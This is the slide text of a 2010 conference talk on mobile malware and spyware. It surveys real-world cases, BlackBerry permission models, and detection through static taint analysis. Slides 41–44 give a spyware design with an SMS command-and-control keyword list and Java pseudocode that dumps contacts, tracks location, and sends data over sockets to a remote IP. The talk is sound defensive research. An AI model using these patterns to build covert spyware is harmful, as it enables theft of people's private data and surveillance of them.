Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareTyler Shields
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers ViewTyler Shields
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyTyler Shields
 
Owasp Ireland - The State of Software Security
Owasp  Ireland - The State of Software SecurityOwasp  Ireland - The State of Software Security
Owasp Ireland - The State of Software SecurityTyler Shields
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More ProblemsTyler Shields
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyTyler Shields
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerTyler Shields
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?Tyler Shields
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTyler Shields
 

Más de Tyler Shields (20)

The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP IrelandThe New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
 
Defending Behind the Mobile Device
Defending Behind the Mobile DeviceDefending Behind the Mobile Device
Defending Behind the Mobile Device
 
Avoiding the Pandora Pitfall
Avoiding the Pandora PitfallAvoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
 
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
 
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social MediaSocial Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
 
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
 
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the BerriesShmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
 
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital ForensicsSurvey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
 
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers ViewpointSource Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
 
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the BerriesSoftware Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
 
Static Detection of Application Backdoors
Static Detection of Application BackdoorsStatic Detection of Application Backdoors
Static Detection of Application Backdoors
 
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned SoftwareBlackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
 
Anti-Debugging - A Developers View
Anti-Debugging - A Developers ViewAnti-Debugging - A Developers View
Anti-Debugging - A Developers View
 
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile PrivacyPraetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
 
Owasp Ireland - The State of Software Security
Owasp  Ireland - The State of Software SecurityOwasp  Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
 
More Apps More Problems
More Apps More ProblemsMore Apps More Problems
More Apps More Problems
 
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your PrivacyDirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
 
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every LayerIT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
 
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
 
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and DevicesTriangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
 

Último

Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfIngrid Airi González
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkPixlogix Infotech
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...Wes McKinney
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...itnewsafrica
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Nikki Chapple
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesManik S Magar
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...itnewsafrica
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPathCommunity
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Kaya Weers
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integrationmarketing932765
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Último (20)

Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
The Future Roadmap for the Composable Data Stack - Wes McKinney - Data Counci...
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
Microsoft 365 Copilot: How to boost your productivity with AI – Part one: Ado...
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotesMuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
MuleSoft Online Meetup Group - B2B Crash Course: Release SparkNotes
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS:  6 Ways to Automate Your Data IntegrationBridging Between CAD & GIS:  6 Ways to Automate Your Data Integration
Bridging Between CAD & GIS: 6 Ways to Automate Your Data Integration
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity Plan
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

BRUCon 2010 - The Monkey Steals the Berries

  • 1. The Monkey Steals the Berries Mobile Malware – The State of Mobile Security
  • 2. Presenter Background  Currently – Sr. Security Researcher, Veracode, Inc.  Previously – Security Consultant - Symantec – Security Consultant - @Stake – Incident Response and Forensics Handler  Wishes He Was – Infinitely rich – Able to leap tall buildings in a single bound – Smarter than the average bear © 2010 Veracode, Inc. 2
  • 3. Agenda  Background  Attacker Motivation  Malicious Mobile Applications In The Wild  Mobile Security Mechanisms  Potential Effects of Behaviors  Detecting Malicious Mobile Applications  Mitigation © 2010 Veracode, Inc. 3
  • 5. Malicious Mobile Applications  Often includes modifications to legitimate programs designed to compromise the device or device data  Often inserted by those who have legitimate access to source code or distribution binaries  May be intentional or inadvertent  Not specific to any particular programming language  Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 5
  • 6. Attacker Motivation © 2010 Veracode, Inc. 6
  • 7. Attacker Motivation  Practical method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV  Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection  For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 7
  • 8. Units Sold By Operating System 90,000.00 80,879 80,000.00 72,934 70,000.00 60,000.00 Units Sold 50,000.00 40,000.00 34,347 2008 Units 2009 Units 30,000.00 24,890 23,149 20,000.00 16,498 11,418 10,622 10,000.00 15,028 6,798 1,193 4,027 8,127 641 0 1,112 0.00 Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs Motion Windows Mobile Data Source: DISTMO Appstore Analytics Operating System www.appstore.info © 2010 Veracode, Inc. 8
  • 9. Units Sold Market Growth 8% 6% 6% Percentage Growth in Market Share 4% 3% 3% 2% 0% 0% Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs 0% Motion Windows Mobile -2% -2% -3% -3% -4% -6% -6% Operating System Data Source: DISTMO Appstore Analytics www.appstore.info © 2010 Veracode, Inc. 9
  • 10. Application Counts 160,000 150,998 140,000 120,000 Number Of Applications In Store Last Counted Jan/Feb 2010 100,000 80,000 60,000 40,000 19,897 20,000 6118 5291 1452 944 0 iPhone App Store Android Nokia Ovi Store Blackberry App Palm App Catalog Windows Marketplace (Maemo) World Marketplace Data Source: DISTMO Appstore Analytics Marketplace Name www.appstore.info © 2010 Veracode, Inc. 10
  • 11. iPhone Applications Sold 3.00 Applications Sold (In Billions) 2.50 2.00 1.50 1.00 0.50 0.00 Data Source: Gartner, Inc., a research and advisory firm © 2010 Veracode, Inc. 11
  • 12. Back To The Future © 2010 Veracode, Inc. 12
  • 13. Back To The Future © 2010 Veracode, Inc. 13
  • 14. Malicious Mobile Applications In The Wild © 2010 Veracode, Inc. 14
  • 15. FlexiSpy  http://www.flexispy.com  $149 - $350 PER YEAR depending on features  Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 15
  • 16. FlexiSpy Web Site Quotes  “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “  “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.”  “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 16
  • 17. Mobile Spy  http://www.mobile-spy.com  $49.97 PER QUARTER or $99.97 PER YEAR  Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 17
  • 18. Mobile Spy Web Site Quotes  “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?”  “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.”  “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 18
  • 19. Etisalat (SS8)  Cell carrier in United Arab Emirates (UAE)  Pushed via SMS as “software patch” for Blackberry smartphones  Upgrade urged to “enhance performance” of Blackberry service  Blackberry PIN messaging as C&C  Sets FLAG_HIDDEN bit to true  Interception of outbound email / SMS only  Discovered due to flooded listener server cause retries that drained batteries of affected devices  Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 19
  • 20. Storm8 Phone Number Farming  iMobsters and Vampires Live (and others)  “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed."  “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.”  These were available via the iTunes App Store!  http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
  • 21. Symbian Sexy Space  Poses as legitimate server ACSServer.exe  Calls itself 'Sexy Space„  Steals phone and network information  Exfiltrates data via hacker owned web site connection  Can SPAM contact list members  Basically a “botnet” for mobile phones  Signing process – Anti-virus scan using F-Secure  Approx 43% proactive detection rate (PCWorld) – Random selection of inbound manually assessed  Symbian signed this binary as safe!  http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
  • 22. Symbian MergoSMS  The worm spreads as self-signed (untrusted) SIS installers  Installer contains sub-SIS installers some of them signed by Symbian.  Spreads by sending text messages – Contain variable messages in Chinese and a link to a website – Going to link results in worm download  On phone reboot malware runs, downloads worm payload, completing infection  The worm was spread on Chinese file sharing web sites  Originally spread as games, themes, etc. for Symbian Series60 3rd & 5th edition phones.  http://www.f-secure.com/v-descs/trojan_symbos_merogosms.shtml © 2010 Veracode, Inc. 22
  • 23. 09Droid – Banking Applications Attack  Droid app that masquerades as any number of different target banking applications  Target banks included – Royal Bank of Canada – Chase – BB&T – SunTrust – Over 50 total financial institutions were affected  May steal and exfiltrate banking credentials  Approved and downloaded from Google’s Android Marketplace!  http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market  http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953  http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 23
  • 24. 3D Anti-Terrorist / PDA Poker Art / Codec Pack WM1.0  Games available on legitimate application download sites  Originally written by Chinese company Huike  Repackaged in Russia by unknown authors to include malware  Calls premium rate 800 numbers  Three days idle before first dial  Idles one month between subsequent outbound dialing  Distributed via common Windows Mobile shareware sites  http://www.eweek.com/c/a/Security/Malware-Hidden-in-Windows- Mobile-Applications-424076/ © 2010 Veracode, Inc. 24
  • 25. Mobile Security Mechanisms © 2010 Veracode, Inc. 25
  • 26. Does It Really Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 26
  • 27. Common Mobile Security Mechanisms  Corporate level security policies  Applied at the corporate IT level  Can‟t be modified by a lower level security mechanism  Application level security policies  May be pushed down from corporate policy  Otherwise applied at handset itself  Restricts access to specific resources  Sandboxing  Code Signing © 2010 Veracode, Inc. 27
  • 28. Common Mobile Security Mechanisms  Mobile Anti-Virus  Implemented at the handset itself  Fails due to the same reasons PC antivirus is failing today  Application market place security screening  Applied by the marketplace owner  Currently opaque and ill defined  Misplaced trust already acquired © 2010 Veracode, Inc. 28
  • 29. Code Signing  Subset of Blackberry API considered “controlled”  Use of controlled package, class, or method requires appropriate code signature  Blackberry Signature Tool comes with the Blackberry JDE  Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys  Install keys into signature tool © 2010 Veracode, Inc. 29
  • 30. Code Signing Process  Hash of code sent to RIM for API tracking purposes only  RIM does not get source code  COD file is signed based on required keys  Application ready to be deployed  Easy to acquire anonymous keys © 2010 Veracode, Inc. 30
  • 31. Blackberry IT Policies  Requires connection to Blackberry Enterprise Server (BES)  Supersedes lower levels of security restrictions  Can prevent devices from downloading third-party applications over wireless  Prevent installation of specific third-party applications  Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 31
  • 32. Blackberry Application Policies  Can be controlled at the BES  If no BES present, controls are set on the handheld itself  Can only be MORE restrictive than the IT policy, never less  Control individual resource access per application  Control individual connection access per application  MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 32
  • 33. V4.7.0.148 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Browser Filtering Recording Reset Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 33
  • 34. V5.0.0.328 Default 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 34
  • 35. V5.0.0.328 Trusted 3rd Party Application Permissions Bluetooth Phone USB Connections Location Data Connections Connections Server Network Internet IPC Device Settings Application Media Themes Input Simulation Management Security Timer Display Information Browser Filtering Recording Reset While Locked Email Data Organizer Data Files Security Data © 2010 Veracode, Inc. 35
  • 36. Potential Effects and Behaviors © 2010 Veracode, Inc. 36
  • 37. Installation Methods  Accessing a web site using the mobile browser and choosing to download the application over the network (OTA Installation)  Running the application loader tool on the desktop system and choosing to download the application onto the device using a physical connection to the computer  Using enterprise management solutions to push the application to the entire user community  Get it into the global application marketplace and let the user choose to install it for you! © 2010 Veracode, Inc. 37
  • 38. Logging and Dumping Monitor connected / disconnected calls Monitor PIM added / removed / updated Monitor inbound SMS Monitor outbound SMS Real Time track GPS coordinates Dump all contacts Dump current location Dump phone logs Dump email Dump microphone capture (security prompted) © 2010 Veracode, Inc. 38
  • 39. Exfiltration and C&C Methods SMS (No CDMA) SMS Datagrams (Supports CDMA) Email HTTP GET HTTP POST TCP Socket UDP Socket DNS Exfiltration Default command and control to inbound SMS TXSPROTO Bidirectional TCP based command and control © 2010 Veracode, Inc. 39
  • 40. Technical Methods  Data Dumpers  Listeners  Exfiltration Methods  Command and Control © 2010 Veracode, Inc. 40
  • 41. Command and Control Channels  initCandC(int a) – Initializes inbound SMS listener if passed a == 1 – Kills spyware otherwise – Listens for commands and acts accordingly TXSDIE TXSPHLON TXSPHLOFF TXSPIMON TXSPIMOFF TXSSLINON TXSSLINOFF TXSSLOUTON TXSSLOUTOFF TXSGLON TXSGLOFF TXSEXFILSMS TXSEXFILSMSDG TXSEXFILEMAIL TXSEXFILGET TXSEXFILPOST TXSEXFILTCP TXSEXFILUDP TXSEXFILDNS TXSDUMPGPS TXSDUMPPL TXSDUMPEMAIL TXSDUMPMIC TXSDUMPCON TXSPROTO TXSPORT[PORT] TXSPHONE:[PN] TXSURL[URL] TXSGTIME:[N] TXSPING TXS:[HOST] TXSIP:[IP] TXSEM:[EMAIL] © 2010 Veracode, Inc. 41
  • 42. Dump Contact Information  API – javax.microedition.pim – net.rim.blackberry.API.pdap  Pseudocode PIM pim = PIM.getInstance(); BlackBerryPIMList contacts = (BlackBerryPIMList) pim.openPIMList(PIM.CONTACT_LIST, PIM.READ_ONLY); Enumeration eContacts = contacts.items(); Contact contact = (Contact) eContacts.nextElement(); if (contacts.isSupportedField(Contact.EMAIL)) { if (contact.countValues(Contact.EMAIL) > 0) email = contact.getString(Contact.EMAIL, 0); } © 2010 Veracode, Inc. 42
  • 43. Location Listener  Create the class that implements LocationListener Interface  Get LocationProvider instance  Add LocationListener  API – javax.microedition.location.LocationProvider.getInstance – javax.microedition.location.LocationProvider.setLocationListener  Pseudocode ll = new LocListener(); lp = LocationProvider.getInstance(null); lp.setLocationListener(ll, 1, 1, 1); © 2010 Veracode, Inc. 43
  • 44. TCP/UDP Exfiltration  API – javax.microedition.io.StreamConnection – javax.microedition.io.DatagramConnection  Pseudocode conn = (StreamConnection)Connector.open("socket://"+this.ip+":"+this.port+"; deviceside=true";); out = new OutputStreamWriter(conn.openOutputStream()); out.write(msg, 0, length); conn = (DatagramConnection)Connector.open("udp://"+this.ip+":"+this.port+";4444"); Datagram out = conn.newDatagram(buf, buf.length); out.setData(buf, 0, buf.length); conn.send(out); © 2010 Veracode, Inc. 44
  • 45. Detecting Malicious Mobile Code © 2010 Veracode, Inc. 45
  • 46. Detecting Malicious Mobile Code  Signature Based Detection – This is how the current anti-virus world is failing – Requires “known” signatures for detection – Too reactive - broken  Resource Usage White Listing – Require individual configuration and white listing of resources – Make it fine grained enough to be effective – Balancing act resulting in user complaints about ease of use – People just click ok - semi broken © 2010 Veracode, Inc. 46
  • 47. Detecting Malicious Mobile Code  Sandbox Based Execution Heuristics – Run the application and detect malicious activity – Requires execution in a sandbox and is reactive – Can‟t ensure complete execution – Also semi broken © 2010 Veracode, Inc. 47
  • 48. Mobile Malicious Code Detection  Enumerate Mobile Sensitive Taint Sources – Sources of potentially private information – This is what the attacker is stealing  Enumeration of Mobile Exfiltration Methods – Methods by which data can be transferred off the mobile device – How the attacker is sending your data out  Code Flow Tracing – Follow data from taint source to exfiltration sink – Annotate the existence of potential exfiltration – Confirm against expected exfiltration of program © 2010 Veracode, Inc. 48
  • 49. Defense in Depth Do all of the above!  Implement and enforce strong IT policies  Implement and enforce additional application policies as required  Implement a best of breed anti-virus solution – If only for thoroughness of deployed options  Utilize static decompilation and analysis of applications considered for deployment © 2010 Veracode, Inc. 49
  • 51. Conclusion  We are currently trusting the vendor application store provider for the majority of our mobile device security  Minimal methods of real time eradication or detection of spyware type activities exists  When the do exist they are not configured correctly (or at all)  No easy/automated way to confirm for ourselves what the applications are actually doing  Automate the decompilation and static analysis of applications that are required for the ongoing functioning of your business © 2010 Veracode, Inc. 51
  • 52. The Monkey Steals the Berries! Questions? © 2010 Veracode, Inc. 52